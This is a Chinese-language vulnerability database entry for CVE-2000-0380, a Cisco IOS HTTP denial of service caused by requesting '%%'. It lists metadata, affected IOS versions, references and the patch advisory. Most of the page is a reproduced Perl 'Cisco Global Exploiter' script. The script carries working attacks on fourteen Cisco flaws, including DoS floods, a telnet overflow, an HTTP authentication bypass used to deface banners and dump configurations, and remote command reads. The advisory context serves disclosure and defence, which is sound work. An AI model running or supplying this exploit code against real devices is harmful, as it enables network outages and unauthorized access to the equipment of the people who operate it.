CVE-2000-0380
CVSS7.1
发布时间 :2000-04-26 00:00:00
修订时间 :2008-09-10 00:00:00
NMCOE    

[原文]The IOS HTTP service in Cisco routers and switches running IOS 11.1 through 12.1 allows remote attackers to cause a denial of service by requesting a URL that contains a %% string.


[CNNVD]Cisco IOS Web管理接口"%%"字串远程拒绝服务攻击漏洞(CNNVD-200004-074)

        
        Cisco IOS是广泛运行于Cisco系统各种网络设备中的操作系统。
        多种Cisco路由器运行的IOS的HTTP管理接口实现上存在漏洞,远程攻击者可能利用此漏洞对设备进行拒绝服务攻击。
        如果这些路由器启动了一个WEB服务器,用来对路由器进行管理或者其他操作的话,(通常是通过添加"ip http server "类似的命令来启动web服务的)攻击者只要提交一个URL: http://victim.router/%% ,就能导致路由器崩溃。有些路由器会自动重起,有的则必须手工关闭电源并启动才能使路由器恢复正常工作。
        

- CVSS (基础分值)

CVSS分值: 7.1 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/o:cisco:ios:12.0%288%29Cisco IOS 12.0(8)
cpe:/o:cisco:ios:11.3Cisco IOS 11.3
cpe:/o:cisco:ios:12.0%282%29xdCisco IOS 12.0.2 XD
cpe:/o:cisco:ios:11.3tCisco IOS 11.3T
cpe:/o:cisco:ios:12.0sCisco IOS 12.0S
cpe:/o:cisco:ios:11.2%284%29f1Cisco IOS 11.2.4 F1
cpe:/o:cisco:ios:12.0Cisco IOS 12.0
cpe:/o:cisco:ios:12.0%282%29xcCisco IOS 12.0.2 XC
cpe:/o:cisco:ios:11.2%289%29xaCisco IOS 11.2.9 XA
cpe:/o:cisco:ios:12.0%283%29t2Cisco IOS 12.0.3 T2
cpe:/o:cisco:ios:12.0%284%29tCisco IOS 12.0.4 T
cpe:/o:cisco:ios:12.0%282%29xfCisco IOS 12.0.2 XF
cpe:/o:cisco:ios:12.0%282%29Cisco IOS 12.0.2
cpe:/o:cisco:ios:11.2%289%29pCisco IOS 11.2.9 P
cpe:/o:cisco:ios:11.3%281%29tCisco IOS 11.3.1 T
cpe:/o:cisco:ios:11.3%281%29edCisco IOS 11.3.1 ED
cpe:/o:cisco:ios:11.2%2810%29bcCisco IOS 11.2.10 BC
cpe:/o:cisco:ios:12.0%284%29sCisco IOS 12.0.4 S
cpe:/o:cisco:ios:12.0%284%29Cisco IOS 12.0.4
cpe:/o:cisco:ios:11.2pCisco IOS 11.2P
cpe:/o:cisco:ios:12.0%281%29xeCisco IOS 12.0.1 XE
cpe:/o:cisco:ios:12.0%286%29Cisco IOS 12.0.6
cpe:/o:cisco:ios:11.2%288%29Cisco IOS 11.2.8
cpe:/o:cisco:ios:12.0%287%29tCisco IOS 12.0(7)T
cpe:/o:cisco:ios:12.0%281%29wCisco IOS 12.0.1 W
cpe:/o:cisco:ios:11.2%288%29pCisco IOS 11.2.8 P
cpe:/o:cisco:ios:11.2Cisco IOS 11.2
cpe:/o:cisco:ios:12.0%285%29t1Cisco IOS 12.0(5)T1
cpe:/o:cisco:ios:12.0%285%29Cisco IOS 12.0.5
cpe:/o:cisco:ios:11.2%2817%29Cisco IOS 11.2(17)
cpe:/o:cisco:ios:11.1Cisco IOS 11.1
cpe:/o:cisco:ios:12.0%281%29xbCisco IOS 12.0.1 XB
cpe:/o:cisco:ios:11.2%2810%29Cisco IOS 11.2.10
cpe:/o:cisco:ios:12.0%281%29xa3Cisco IOS 12.0.1 XA3
cpe:/o:cisco:ios:11.3%281%29Cisco IOS 11.3.1
cpe:/o:cisco:ios:12.0tCisco IOS 12.0T
cpe:/o:cisco:ios:12.0%282%29xgCisco IOS 12.0.2 XG
cpe:/o:cisco:ios:12.0dbCisco IOS 12.0DB
cpe:/o:cisco:ios:12.0%289%29sCisco IOS 12.0(9)S

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5938Cisco IOS HTTP Configuration Interface Denial of Service Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0380
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0380
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-074
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1154
(UNKNOWN)  BID  1154
http://www.osvdb.org/1302
(UNKNOWN)  OSVDB  1302
http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml
(UNKNOWN)  CISCO  20000514 Cisco IOS HTTP Server Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2000-04/0261.html
(UNKNOWN)  BUGTRAQ  20000426 Cisco HTTP possible bug:

- 漏洞信息

Cisco IOS Web管理接口"%%"字串远程拒绝服务攻击漏洞
高危 输入验证
2000-04-26 00:00:00 2005-07-27 00:00:00
远程  
        
        Cisco IOS是广泛运行于Cisco系统各种网络设备中的操作系统。
        多种Cisco路由器运行的IOS的HTTP管理接口实现上存在漏洞,远程攻击者可能利用此漏洞对设备进行拒绝服务攻击。
        如果这些路由器启动了一个WEB服务器,用来对路由器进行管理或者其他操作的话,(通常是通过添加"ip http server "类似的命令来启动web服务的)攻击者只要提交一个URL: http://victim.router/%% ,就能导致路由器崩溃。有些路由器会自动重起,有的则必须手工关闭电源并启动才能使路由器恢复正常工作。
        

- 公告与补丁

        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(CI-00.04)以及相应补丁:
        CI-00.04:Cisco IOS HTTP Server Vulnerability
        链接:
        补丁下载:
        
        http://www.cisco.com/

- 漏洞信息 (19882)

Cisco IOS 11.x/12.x HTTP %% Vulnerability (EDBID:19882)
hardware remote
2000-04-26 Verified
0 Keith Woodworth
N/A [点击下载]
source: http://www.securityfocus.com/bid/1154/info

A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  -close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

		

- 漏洞信息

1302
Cisco IOS HTTP Service %% GET Request Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when an HTTP GET request for the string %% is sent to the router, and will result in loss of availability for the platform.

- 时间线

2000-05-14 2000-04-26
Unknow Unknow

- 解决方案

Upgrade to version indicated by Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站